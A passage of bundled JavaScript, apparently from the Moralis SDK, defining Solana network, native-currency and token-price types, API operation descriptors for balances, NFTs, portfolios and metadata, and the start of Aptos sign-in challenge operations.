         * @example SolNetwork.MAINNET
         */ get: function() {
            return SolNetwork.create("mainnet");
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(SolNetwork, "DEVNET", {
        /**
         * Returns DEVNET network
         *
         * @example SolNetwork.MAINNET
         */ get: function() {
            return SolNetwork.create("devnet");
        },
        enumerable: false,
        configurable: true
    });
    /**
     * Create a new instance of SolNetwork from any valid network input.
     *
     * @example `const network = SolNetwork.create("mainnet")`
     * @throws an error when a passed network is invalid.
     */ SolNetwork.create = function(network) {
        return network instanceof SolNetwork ? network : new SolNetwork(SolNetwork.parse(network));
    };
    SolNetwork.fromJSON = function(network) {
        return SolNetwork.create(network);
    };
    SolNetwork.parse = function(network) {
        if (typeof network === "string") {
            if (!$cb2d40467f9cecb7$var$solNetworkNames.includes(network)) throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
                code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
                message: "Solana network is not supported: ".concat(network)
            });
        }
        return network;
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ SolNetwork.prototype.format = function() {
        return this.network;
    };
    /**
     * Checks the equality of the current network with another Solana network.
     * @example `network.equals("mainnet")`
     * @example `network.equals(SolNetwork.create("mainnet"))`
     */ SolNetwork.prototype.equals = function(network) {
        return this.network === SolNetwork.create(network).network;
    };
    /**
     * @returns a string representing the network.
     * @example network.toJSON(); // "mainnet"
     */ SolNetwork.prototype.toJSON = function() {
        return this.network;
    };
    /**
     * @returns a string representing the network.
     * @example network.toString(); // "mainnet"
     */ SolNetwork.prototype.toString = function() {
        return this.network;
    };
    return SolNetwork;
}();
var $cb2d40467f9cecb7$var$unitToDecimals = {
    solana: 9,
    lamports: 0
};
/**
 * The SolNative class is a MoralisData that references to the value of Solana native currency SOL
 *
 * @category DataType
 */ var $cb2d40467f9cecb7$export$84267d4940c038d5 = /** @class */ function() {
    function SolNative(rawValue) {
        this.rawValue = rawValue;
    }
    /**
     * Create a new instance of SolNative from any valid {@link SolNativeish} value.
     * @param value - the value to create the SolNative from
     * @param unit - the unit of the value (optional), defaults to `solana`
     * @returns a new instance of SolNative
     * @example
     * ```ts
     * const native = SolNative.create(2, 'lamports');
     * const native = SolNative.create(2);
     *```
     */ SolNative.create = function(value, unit) {
        if (value instanceof SolNative) return value;
        return new SolNative(SolNative.parse(value, unit));
    };
    SolNative.fromJSON = function(json) {
        return SolNative.create(json, "lamports");
    };
    SolNative.parse = function(value, unit) {
        if (unit === void 0) unit = "solana";
        var decimal;
        if (typeof unit === "number") decimal = unit;
        else if ($cb2d40467f9cecb7$var$unitToDecimals[unit] !== undefined) decimal = $cb2d40467f9cecb7$var$unitToDecimals[unit];
        else throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
            code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
            message: "Not supported Solana unit: ".concat(unit)
        });
        return (0, $10891f2cb3e98601$export$d97aa349ed20696).fromDecimal(value.toString(), decimal);
    };
    /**
     * Compares two SolNativeish values.
     * @param valueA - the first value to compare
     * @param valueB - the second value to compare
     * @returns true if the values are equal
     * @example
     * ```ts
     * SolNative.equals(SolNative.create(1), SolNative.create(1)); // true
     * ```
     */ SolNative.equals = function(valueA, valueB) {
        var solNativeA = SolNative.create(valueA);
        var solNativeB = SolNative.create(valueB);
        return solNativeA.lamports === solNativeB.lamports;
    };
    /**
     * Compares SolNative with current instance.
     * @param value - the value to compare with
     * @returns true if the values are equal
     * @example
     * ```ts
     * const native = SolNative.create(2, 'lamports');
     * native.equals(SolNative.create(1)); // false
     * ```
     */ SolNative.prototype.equals = function(value) {
        return SolNative.equals(this, value);
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ SolNative.prototype.format = function() {
        // TODO: add `format` argument
        return this.lamports;
    };
    /**
     * Converts the SolNative to a string.
     * @returns the value of the SolNative as a string
     * @example `native.toJSON()`
     */ SolNative.prototype.toJSON = function() {
        return this.lamports;
    };
    /**
     * Converts the SolNative to a string.
     * @returns the value of the SolNative as a string
     * @example `native.toString()`
     */ SolNative.prototype.toString = function() {
        return this.lamports;
    };
    Object.defineProperty(SolNative.prototype, "value", {
        /**
         * @returns the value of the SolNative as a BigNumber
         * @example `native.value`
         */ get: function() {
            return this.rawValue;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(SolNative.prototype, "solana", {
        /**
         * Converts the SolNative to a solana unit.
         * @returns the value of the SolNative as a solana string
         * @example `native.solana`
         */ get: function() {
            return this.rawValue.toDecimal($cb2d40467f9cecb7$var$unitToDecimals["solana"]);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(SolNative.prototype, "lamports", {
        /**
         * Converts the SolNative to a string.
         * @returns the value of the SolNative as a string
         * @example `native.lamports`
         */ get: function() {
            return this.rawValue.toString();
        },
        enumerable: false,
        configurable: true
    });
    return SolNative;
}();
// $ref: #/components/schemas/SPLNativePrice
// type: SPLNativePrice
// properties:
// - value ($ref: #/components/schemas/SPLNativePrice/properties/value)
// - decimals ($ref: #/components/schemas/SPLNativePrice/properties/decimals)
// - name ($ref: #/components/schemas/SPLNativePrice/properties/name)
// - symbol ($ref: #/components/schemas/SPLNativePrice/properties/symbol)
var $cb2d40467f9cecb7$export$dc85ab4233db941f = /** @class */ function() {
    function SolSPLNativePrice(input) {
        this.value = input.value;
        this.decimals = input.decimals;
        this.name = input.name;
        this.symbol = input.symbol;
    }
    SolSPLNativePrice.create = function(input) {
        if (input instanceof SolSPLNativePrice) return input;
        return new SolSPLNativePrice(input);
    };
    SolSPLNativePrice.fromJSON = function(json) {
        var input = {
            value: json.value,
            decimals: json.decimals,
            name: json.name,
            symbol: json.symbol
        };
        return SolSPLNativePrice.create(input);
    };
    SolSPLNativePrice.prototype.toJSON = function() {
        return {
            value: this.value,
            decimals: this.decimals,
            name: this.name,
            symbol: this.symbol
        };
    };
    return SolSPLNativePrice;
}();
var $cb2d40467f9cecb7$export$7a19c5f2d4b8f41d = /** @class */ function() {
    function SolSPLTokenPrice(input) {
        this.nativePrice = input.nativePrice ? $cb2d40467f9cecb7$export$dc85ab4233db941f.create(input.nativePrice) : undefined;
        this.usdPrice = input.usdPrice;
        this.exchangeAddress = $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(input.exchangeAddress);
        this.exchangeName = input.exchangeName;
    }
    SolSPLTokenPrice.create = function(input) {
        if (input instanceof SolSPLTokenPrice) return input;
        return new SolSPLTokenPrice(input);
    };
    SolSPLTokenPrice.fromJSON = function(json) {
        var input = {
            nativePrice: json.nativePrice ? $cb2d40467f9cecb7$export$dc85ab4233db941f.fromJSON(json.nativePrice) : undefined,
            usdPrice: json.usdPrice,
            exchangeAddress: $cb2d40467f9cecb7$export$a1a535cec16ecc43.fromJSON(json.exchangeAddress),
            exchangeName: json.exchangeName
        };
        return SolSPLTokenPrice.create(input);
    };
    SolSPLTokenPrice.prototype.toJSON = function() {
        return {
            nativePrice: this.nativePrice ? this.nativePrice.toJSON() : undefined,
            usdPrice: this.usdPrice,
            exchangeAddress: this.exchangeAddress.toJSON(),
            exchangeName: this.exchangeName
        };
    };
    return SolSPLTokenPrice;
}();
var $cb2d40467f9cecb7$export$9ab183f776707895 = {
    operationId: "getTokenPrice",
    groupName: "token",
    httpMethod: "get",
    routePattern: "/token/{network}/{address}/price",
    parameterNames: [
        "network",
        "address"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $cb2d40467f9cecb7$export$7a19c5f2d4b8f41d.fromJSON(json);
    },
    serializeRequest: function(request) {
        var network = $cb2d40467f9cecb7$export$27894271d6c8b00.create(request.network);
        var address = $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address);
        return {
            network: network.toJSON(),
            address: address.toJSON()
        };
    }
};
var $cb2d40467f9cecb7$export$59894c102379d64a = [
    $cb2d40467f9cecb7$export$9ab183f776707895
];
// $ref: #/paths/~1token~1{network}~1{address}~1price/get/parameters/0/schema
// typeName: getTokenPrice_network_Enum
var $cb2d40467f9cecb7$export$3ca4c74312f0506c = /** @class */ function() {
    function SolGetTokenPriceNetworkEnum() {}
    SolGetTokenPriceNetworkEnum.create = function(input) {
        return input;
    };
    SolGetTokenPriceNetworkEnum.fromJSON = function(json) {
        return json;
    };
    return SolGetTokenPriceNetworkEnum;
}();
/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $cb2d40467f9cecb7$var$extendStatics = function(d, b) {
    $cb2d40467f9cecb7$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p];
    };
    return $cb2d40467f9cecb7$var$extendStatics(d, b);
};
function $cb2d40467f9cecb7$var$__extends(d, b) {
    if (typeof b !== "function" && b !== null) throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
    $cb2d40467f9cecb7$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
function $cb2d40467f9cecb7$var$__spreadArray(to, from, pack) {
    if (pack || arguments.length === 2) {
        for(var i = 0, l = from.length, ar; i < l; i++)if (ar || !(i in from)) {
            if (!ar) ar = Array.prototype.slice.call(from, 0, i);
            ar[i] = from[i];
        }
    }
    return to.concat(ar || Array.prototype.slice.call(from));
}
var $cb2d40467f9cecb7$export$f056e425d9861c04 = {
    defaultSolNetwork: {
        name: "defaultSolNetwork",
        defaultValue: "mainnet"
    }
};
var $cb2d40467f9cecb7$export$231c3f25a020a727 = /** @class */ function() {
    function CommonSolUtilsConfigSetup() {}
    CommonSolUtilsConfigSetup.register = function(config) {
        config.registerKey($cb2d40467f9cecb7$export$f056e425d9861c04.defaultSolNetwork);
    };
    return CommonSolUtilsConfigSetup;
}();
var $cb2d40467f9cecb7$export$884ef4b70f41d4a4 = /** @class */ function(_super) {
    $cb2d40467f9cecb7$var$__extends(CommonSolUtils, _super);
    function CommonSolUtils(core) {
        return _super.call(this, CommonSolUtils.moduleName, core) || this;
    }
    CommonSolUtils.create = function(core) {
        return new CommonSolUtils(core !== null && core !== void 0 ? core : (0, $10891f2cb3e98601$export$211989d19e9f0ff7).getDefault());
    };
    CommonSolUtils.prototype.setup = function() {
        $cb2d40467f9cecb7$export$231c3f25a020a727.register(this.core.config);
    };
    CommonSolUtils.prototype.start = function() {
    // Nothing
    };
    Object.defineProperty(CommonSolUtils.prototype, "SolAddress", {
        get: function() {
            return $cb2d40467f9cecb7$export$a1a535cec16ecc43;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(CommonSolUtils.prototype, "SolNative", {
        get: function() {
            return $cb2d40467f9cecb7$export$84267d4940c038d5;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(CommonSolUtils.prototype, "SolNetwork", {
        get: function() {
            return $cb2d40467f9cecb7$export$27894271d6c8b00;
        },
        enumerable: false,
        configurable: true
    });
    CommonSolUtils.moduleName = "solUtils";
    return CommonSolUtils;
}((0, $10891f2cb3e98601$export$c3a9d7ff17e4f3ed));
var $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5 = /** @class */ function() {
    function SolNetworkResolver() {}
    SolNetworkResolver.resolve = function(network, core) {
        if (!network) network = core.config.get($cb2d40467f9cecb7$export$f056e425d9861c04.defaultSolNetwork);
        return $cb2d40467f9cecb7$export$27894271d6c8b00.create(network).network;
    };
    return SolNetworkResolver;
}();
/** Gets native balance owned by the given network and address */ var $cb2d40467f9cecb7$export$cec705c2a98d6e79 = {
    method: "GET",
    name: "getBalance",
    id: "balance",
    groupName: "account",
    urlPathParamNames: [
        "network",
        "address"
    ],
    urlPathPattern: "/account/{network}/{address}/balance",
    getRequestUrlParams: $cb2d40467f9cecb7$var$getRequestUrlParams$5,
    deserializeResponse: $cb2d40467f9cecb7$var$deserializeResponse$5,
    serializeRequest: $cb2d40467f9cecb7$var$serializeRequest$5,
    deserializeRequest: $cb2d40467f9cecb7$var$deserializeRequest$5
};
// Methods
function $cb2d40467f9cecb7$var$getRequestUrlParams$5(request, core) {
    return {
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address
    };
}
function $cb2d40467f9cecb7$var$deserializeResponse$5(jsonResponse) {
    return $cb2d40467f9cecb7$export$84267d4940c038d5.create(jsonResponse.lamports);
}
function $cb2d40467f9cecb7$var$serializeRequest$5(request, core) {
    return {
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address,
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core)
    };
}
function $cb2d40467f9cecb7$var$deserializeRequest$5(jsonRequest) {
    return {
        network: $cb2d40467f9cecb7$export$27894271d6c8b00.create(jsonRequest.network),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(jsonRequest.address)
    };
}
/** Gets NFTs owned by the given network and address */ var $cb2d40467f9cecb7$export$5f65ec0a833b5ee0 = {
    method: "GET",
    name: "getNFTs",
    id: "getNFTs",
    groupName: "account",
    urlPathParamNames: [
        "network",
        "address"
    ],
    urlPathPattern: "/account/{network}/{address}/nft",
    getRequestUrlParams: $cb2d40467f9cecb7$var$getRequestUrlParams$4,
    deserializeResponse: $cb2d40467f9cecb7$var$deserializeResponse$4,
    serializeRequest: $cb2d40467f9cecb7$var$serializeRequest$4,
    deserializeRequest: $cb2d40467f9cecb7$var$deserializeRequest$4
};
// Methods
function $cb2d40467f9cecb7$var$getRequestUrlParams$4(request, core) {
    return {
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address
    };
}
function $cb2d40467f9cecb7$var$deserializeResponse$4(jsonResponse) {
    return jsonResponse.map(function(item) {
        return {
            associatedTokenAddress: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(item.associatedTokenAddress),
            mint: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(item.mint),
            name: item.name,
            symbol: item.symbol
        };
    });
}
function $cb2d40467f9cecb7$var$serializeRequest$4(request, core) {
    return {
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address,
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core)
    };
}
function $cb2d40467f9cecb7$var$deserializeRequest$4(jsonRequest) {
    return {
        network: $cb2d40467f9cecb7$export$27894271d6c8b00.create(jsonRequest.network),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(jsonRequest.address)
    };
}
/** Gets the portfolio of the given network and address */ var $cb2d40467f9cecb7$export$58ffda6470f20b36 = {
    method: "GET",
    name: "getPortfolio",
    id: "getPortfolio",
    groupName: "account",
    urlPathParamNames: [
        "network",
        "address"
    ],
    urlPathPattern: "/account/{network}/{address}/portfolio",
    getRequestUrlParams: $cb2d40467f9cecb7$var$getRequestUrlParams$3,
    deserializeResponse: $cb2d40467f9cecb7$var$deserializeResponse$3,
    serializeRequest: $cb2d40467f9cecb7$var$serializeRequest$3,
    deserializeRequest: $cb2d40467f9cecb7$var$deserializeRequest$3
};
// Methods
function $cb2d40467f9cecb7$var$getRequestUrlParams$3(request, core) {
    return {
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address
    };
}
function $cb2d40467f9cecb7$var$deserializeResponse$3(jsonResponse) {
    return {
        nativeBalance: $cb2d40467f9cecb7$export$84267d4940c038d5.create(jsonResponse.nativeBalance.lamports, "lamports"),
        nfts: jsonResponse.nfts.map(function(nft) {
            return {
                associatedTokenAddress: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(nft.associatedTokenAddress),
                mint: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(nft.mint),
                name: nft.name,
                symbol: nft.symbol
            };
        }),
        tokens: jsonResponse.tokens.map(function(token) {
            return {
                associatedTokenAddress: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(token.associatedTokenAddress),
                mint: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(token.mint),
                amount: $cb2d40467f9cecb7$export$84267d4940c038d5.create(token.amountRaw, "lamports"),
                name: token.name,
                symbol: token.symbol
            };
        })
    };
}
function $cb2d40467f9cecb7$var$serializeRequest$3(request, core) {
    return {
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address,
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core)
    };
}
function $cb2d40467f9cecb7$var$deserializeRequest$3(jsonRequest) {
    return {
        network: $cb2d40467f9cecb7$export$27894271d6c8b00.create(jsonRequest.network),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(jsonRequest.address)
    };
}
/** Gets token balances owned by the given network and address */ var $cb2d40467f9cecb7$export$f54e822472a0e90c = {
    method: "GET",
    name: "getSPL",
    id: "getSPL",
    groupName: "account",
    urlPathParamNames: [
        "network",
        "address"
    ],
    urlPathPattern: "/account/{network}/{address}/tokens",
    getRequestUrlParams: $cb2d40467f9cecb7$var$getRequestUrlParams$2,
    deserializeResponse: $cb2d40467f9cecb7$var$deserializeResponse$2,
    serializeRequest: $cb2d40467f9cecb7$var$serializeRequest$2,
    deserializeRequest: $cb2d40467f9cecb7$var$deserializeRequest$2
};
// Methods
function $cb2d40467f9cecb7$var$getRequestUrlParams$2(request, core) {
    return {
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address
    };
}
function $cb2d40467f9cecb7$var$deserializeResponse$2(jsonResponse) {
    return jsonResponse.map(function(token) {
        return {
            associatedTokenAddress: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(token.associatedTokenAddress),
            mint: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(token.mint),
            amount: $cb2d40467f9cecb7$export$84267d4940c038d5.create(token.amountRaw, "lamports"),
            name: token.name,
            symbol: token.symbol
        };
    });
}
function $cb2d40467f9cecb7$var$serializeRequest$2(request, core) {
    return {
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address,
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core)
    };
}
function $cb2d40467f9cecb7$var$deserializeRequest$2(jsonRequest) {
    return {
        network: $cb2d40467f9cecb7$export$27894271d6c8b00.create(jsonRequest.network),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(jsonRequest.address)
    };
}
/** Gets the contract level metadata (mint, standard, name, symbol, metaplex) for the given network and contract */ var $cb2d40467f9cecb7$export$4767c6e68c3a24f7 = {
    method: "GET",
    name: "getNFTMetadata",
    id: "getNFTMetadata",
    groupName: "nft",
    urlPathParamNames: [
        "network",
        "address"
    ],
    urlPathPattern: "/nft/{network}/{address}/metadata",
    getRequestUrlParams: $cb2d40467f9cecb7$var$getRequestUrlParams$1,
    deserializeResponse: $cb2d40467f9cecb7$var$deserializeResponse$1,
    serializeRequest: $cb2d40467f9cecb7$var$serializeRequest$1,
    deserializeRequest: $cb2d40467f9cecb7$var$deserializeRequest$1
};
// Methods
function $cb2d40467f9cecb7$var$getRequestUrlParams$1(request, core) {
    return {
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address
    };
}
function $cb2d40467f9cecb7$var$deserializeResponse$1(jsonResponse) {
    return {
        mint: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(jsonResponse.mint),
        standard: jsonResponse.standard,
        name: jsonResponse.name,
        symbol: jsonResponse.symbol,
        metaplex: {
            metadataUri: jsonResponse.metaplex.metadataUri,
            updateAuthority: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(jsonResponse.metaplex.updateAuthority),
            sellerFeeBasisPoints: jsonResponse.metaplex.sellerFeeBasisPoints,
            primarySaleHappened: jsonResponse.metaplex.primarySaleHappened,
            isMutable: jsonResponse.metaplex.isMutable,
            masterEdition: jsonResponse.metaplex.masterEdition
        }
    };
}
function $cb2d40467f9cecb7$var$serializeRequest$1(request, core) {
    return {
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address,
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core)
    };
}
function $cb2d40467f9cecb7$var$deserializeRequest$1(jsonRequest) {
    return {
        network: $cb2d40467f9cecb7$export$27894271d6c8b00.create(jsonRequest.network),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(jsonRequest.address)
    };
}
/** Gets the token price (usd and native) for a given contract address and network */ var $cb2d40467f9cecb7$export$fc69d783890468cd = {
    method: "GET",
    name: "getTokenPrice",
    id: "getTokenPrice",
    groupName: "token",
    urlPathParamNames: [
        "network",
        "address"
    ],
    urlPathPattern: "/token/{network}/{address}/price",
    getRequestUrlParams: $cb2d40467f9cecb7$var$getRequestUrlParams,
    deserializeResponse: $cb2d40467f9cecb7$var$deserializeResponse,
    serializeRequest: $cb2d40467f9cecb7$var$serializeRequest,
    deserializeRequest: $cb2d40467f9cecb7$var$deserializeRequest
};
// Methods
function $cb2d40467f9cecb7$var$getRequestUrlParams(request, core) {
    var network = $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core);
    if (network !== "mainnet") throw new (0, $10891f2cb3e98601$export$1e54abe040eff0f)({
        message: "Incorrct value for 'network', getTokenPrice is only available on mainnet",
        code: (0, $10891f2cb3e98601$export$dbc62e876b4a53ce).INVALID_PARAMS
    });
    return {
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address
    };
}
function $cb2d40467f9cecb7$var$deserializeResponse(jsonResponse) {
    return $cb2d40467f9cecb7$export$7a19c5f2d4b8f41d.fromJSON(jsonResponse);
}
function $cb2d40467f9cecb7$var$serializeRequest(request, core) {
    return {
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(request.address).address,
        network: $cb2d40467f9cecb7$export$ab83e9a6ca4f45c5.resolve(request.network, core)
    };
}
function $cb2d40467f9cecb7$var$deserializeRequest(jsonRequest) {
    return {
        network: $cb2d40467f9cecb7$export$27894271d6c8b00.create(jsonRequest.network),
        address: $cb2d40467f9cecb7$export$a1a535cec16ecc43.create(jsonRequest.address)
    };
}
var $cb2d40467f9cecb7$export$98fbccab943d12e2 = [
    $cb2d40467f9cecb7$export$cec705c2a98d6e79,
    $cb2d40467f9cecb7$export$5f65ec0a833b5ee0,
    $cb2d40467f9cecb7$export$58ffda6470f20b36,
    $cb2d40467f9cecb7$export$f54e822472a0e90c,
    $cb2d40467f9cecb7$export$4767c6e68c3a24f7
];
/**
 * @deprecated This list includes upgraded operations to the hybrid approach in the old format.
 */ var $cb2d40467f9cecb7$export$c8101ad4d0b09783 = $cb2d40467f9cecb7$var$__spreadArray($cb2d40467f9cecb7$var$__spreadArray([], $cb2d40467f9cecb7$export$98fbccab943d12e2, true), [
    $cb2d40467f9cecb7$export$fc69d783890468cd
], false);








/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ var $6d44480aa8bfcb7a$var$__assign = function() {
    $6d44480aa8bfcb7a$var$__assign = Object.assign || function __assign(t) {
        for(var s, i = 1, n = arguments.length; i < n; i++){
            s = arguments[i];
            for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p)) t[p] = s[p];
        }
        return t;
    };
    return $6d44480aa8bfcb7a$var$__assign.apply(this, arguments);
};
function $6d44480aa8bfcb7a$var$__rest(s, e) {
    var t = {};
    for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p) && e.indexOf(p) < 0) t[p] = s[p];
    if (s != null && typeof Object.getOwnPropertySymbols === "function") {
        for(var i = 0, p = Object.getOwnPropertySymbols(s); i < p.length; i++)if (e.indexOf(p[i]) < 0 && Object.prototype.propertyIsEnumerable.call(s, p[i])) t[p[i]] = s[p[i]];
    }
    return t;
}
var $6d44480aa8bfcb7a$export$a4f0d9af7f5deedd = {
    method: "POST",
    name: "verifyChallengeAptos",
    id: "verifyChallengeAptos",
    groupName: "aptos",
    urlPathPattern: "/challenge/verify/aptos",
    bodyParamNames: [
        "message",
        "signature"
    ],
    bodyType: "properties",
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams$a,
    getRequestBody: $6d44480aa8bfcb7a$var$getRequestBody$9,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest$a,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest$a,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse$a
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams$a() {
    return {};
}
function $6d44480aa8bfcb7a$var$getRequestBody$9(request) {
    return {
        message: request.message,
        signature: request.signature
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse$a(_a) {
    var network = _a.network, jsonResponse = $6d44480aa8bfcb7a$var$__rest(_a, [
        "network"
    ]);
    return $6d44480aa8bfcb7a$var$__assign($6d44480aa8bfcb7a$var$__assign({}, jsonResponse), {
        network: (0, $a7ef34a427d74c9c$export$5f4e060315c73a8).create(network),
        address: (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(jsonResponse.address),
        expirationTime: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonResponse.expirationTime, function(value) {
            return new Date(value);
        }),
        notBefore: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonResponse.notBefore, function(value) {
            return new Date(value);
        })
    });
}
function $6d44480aa8bfcb7a$var$serializeRequest$a(request) {
    return {
        message: request.message,
        signature: request.signature
    };
}
function $6d44480aa8bfcb7a$var$deserializeRequest$a(jsonRequest) {
    return {
        message: jsonRequest.message,
        signature: jsonRequest.signature
    };
}
/** The back channel challenge containing the id to store on the api and the message to be signed by the user */ var $6d44480aa8bfcb7a$export$77a3605096ebf35e = {
    method: "POST",
    name: "requestChallengeAptos",
    id: "requestChallengeAptos",
    groupName: "aptos",
    urlPathPattern: "/challenge/request/aptos",
    bodyParamNames: [
        "domain",
        "network",
        "address",
        "statement",
        "uri",
        "expirationTime",
        "notBefore",
        "resources",
        "timeout",
        "publicKey"
    ],
    bodyType: "properties",
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams$9,
    getRequestBody: $6d44480aa8bfcb7a$var$getRequestBody$8,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest$9,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest$9,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse$9
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams$9() {
    return {};
}
function $6d44480aa8bfcb7a$var$getRequestBody$8(request) {
    return {
        domain: request.domain,
        network: (0, $a7ef34a427d74c9c$export$5f4e060315c73a8).create(request.network).toString(),
        address: (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(request.address).toString(),
        publicKey: request.publicKey,
        statement: request.statement,
        uri: request.uri,
        expirationTime: request.expirationTime,
        notBefore: request.notBefore,
        resources: request.resources,
        timeout: request.timeout
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse$9(jsonResponse) {
    return jsonResponse;
}
function $6d44480aa8bfcb7a$var$serializeRequest$9(request, core) {
    return {
        domain: request.domain,
        network: (0, $a7ef34a427d74c9c$export$6779c8260151004a).resolve(request.network, core),
        address: (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(request.address).toString(),
        publicKey: request.publicKey,
        statement: request.statement,
        uri: request.uri,
        expirationTime: request.expirationTime,
        notBefore: request.notBefore,
        resources: request.resources,
        timeout: request.timeout
    };
}
function $6d44480aa8bfcb7a$var$deserializeRequest$9(jsonRequest) {
    return {
        domain: jsonRequest.domain,
